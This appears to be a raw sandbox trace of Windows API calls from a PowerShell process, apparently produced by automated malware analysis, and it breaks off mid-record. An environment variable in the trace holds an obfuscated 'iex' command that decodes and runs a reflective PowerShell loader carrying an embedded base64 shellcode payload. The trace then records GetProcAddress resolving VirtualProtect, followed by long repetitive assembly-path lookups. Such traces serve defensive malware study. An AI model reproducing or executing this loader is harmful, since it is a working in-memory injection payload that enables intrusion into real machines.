MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr") returned 0x7307 [0090.637] GetLastError () returned 0xcb [0090.645] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x7308 [0090.645] GetLastError () returned 0xcb [0090.645] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x50a0f58, nSize=0x7308 | out: lpBuffer="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr") returned 0x7307 [0090.645] GetLastError () returned 0xcb [0090.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.649] GetLastError () returned 0xcb [0090.702] VirtualQuery (in: lpAddress=0x60ae254, lpBuffer=0x60af254, dwLength=0x1c | out: lpBuffer=0x60af254*(BaseAddress=0x60ae000, AllocationBase=0x5720000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.831] VirtualQuery (in: lpAddress=0x60adfc8, lpBuffer=0x60aefc8, dwLength=0x1c | out: lpBuffer=0x60aefc8*(BaseAddress=0x60ad000, AllocationBase=0x5720000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.860] GetLastError () returned 0xcb [0090.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0090.911] GetLastError () returned 0xcb [0090.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0090.925] GetLastError () returned 0xcb [0090.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0090.925] GetLastError () returned 0xcb [0090.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.927] GetLastError () returned 0xcb [0090.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0090.927] GetLastError () returned 0xcb [0090.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0090.927] GetLastError () returned 0xcb [0090.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0090.927] GetLastError () returned 0xcb [0090.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0090.927] GetLastError () returned 0xcb [0090.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0090.928] GetLastError () returned 0xcb [0090.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0090.928] GetLastError () returned 0xcb [0090.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0090.928] GetLastError () returned 0xcb [0090.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0090.928] GetLastError () returned 0xcb [0090.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0090.928] GetLastError () returned 0xcb [0090.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0090.928] GetLastError () returned 0xcb [0090.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0090.929] GetLastError () returned 0xcb [0090.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50 [0090.929] GetLastError () returned 0xcb [0090.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.965] GetLastError () returned 0xcb [0090.979] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76f00000 [0090.980] GetProcAddress (hModule=0x76f00000, lpProcName="VirtualProtect") returned 0x76f1435f [0091.000] CoCreateGuid (in: pguid=0x60adba8 | out: pguid=0x60adba8*(Data1=0x842fe76, Data2=0x8313, Data3=0x48ad, Data4=([0]=0x99, [1]=0x36, [2]=0x4d, [3]=0x8f, [4]=0x30, [5]=0xdf, [6]=0x3, [7]=0x3e))) returned 0x0 [0091.036] CoCreateGuid (in: pguid=0x60ae160 | out: pguid=0x60ae160*(Data1=0x688c525f, Data2=0x8a76, Data3=0x484d, Data4=([0]=0xac, [1]=0x50, [2]=0x11, [3]=0xf4, [4]=0xc9, [5]=0x54, [6]=0xd6, [7]=0xe0))) returned 0x0 [0091.112] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0091.112] GetLastError () returned 0xcb [0091.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x60aea6c | out: lpConsoleScreenBufferInfo=0x60aea6c) returned 1 [0091.113] GetLastError () returned 0xcb [0091.113] GetConsoleOutputCP () returned 0x1b5 [0091.113] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x60aea74, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x60aea74) returned 0 [0091.114] GetLastError () returned 0xcb [0091.114] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.114] GetLastError () returned 0xcb [0091.114] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x60aeabc | out: lpMode=0x60aeabc) returned 1 [0091.114] GetLastError () returned 0xcb [0091.117] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0091.117] GetLastError () returned 0xcb [0091.117] GetConsoleMode (in: hConsoleHandle=0x13, lpMode=0x60aeaa0 | out: lpMode=0x60aeaa0) returned 1 [0091.117] GetLastError () returned 0xcb [0091.118] WriteConsoleW (in: hConsoleOutput=0x13, lpBuffer=0x358279c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x60aeaa0, lpReserved=0x0 | out: lpBuffer=0x358279c*, lpNumberOfCharsWritten=0x60aeaa0*=0x1) returned 1 [0091.119] GetLastError () returned 0xcb [0091.122] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0091.122] GetLastError () returned 0xcb [0091.122] GetConsoleMode (in: hConsoleHandle=0x13, lpMode=0x60aeaa0 | out: lpMode=0x60aeaa0) returned 1 [0091.122] GetLastError () returned 0xcb [0091.123] WriteConsoleW (in: hConsoleOutput=0x13, lpBuffer=0x35828ec*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x60aeaa0, lpReserved=0x0 | out: lpBuffer=0x35828ec*, lpNumberOfCharsWritten=0x60aeaa0*=0x2) returned 1 [0091.123] GetLastError () returned 0xcb [0091.123] CloseHandle (hObject=0x13) returned 1 [0091.123] GetLastError () returned 0xcb [0091.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0091.124] GetLastError () returned 0xcb [0091.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0091.124] GetLastError () returned 0xcb [0091.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0091.124] GetLastError () returned 0xcb [0091.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.124] GetLastError () returned 0xcb [0091.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0091.124] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0091.125] GetLastError () returned 0xcb [0091.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x60ae150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0091.125] GetLastError () returned 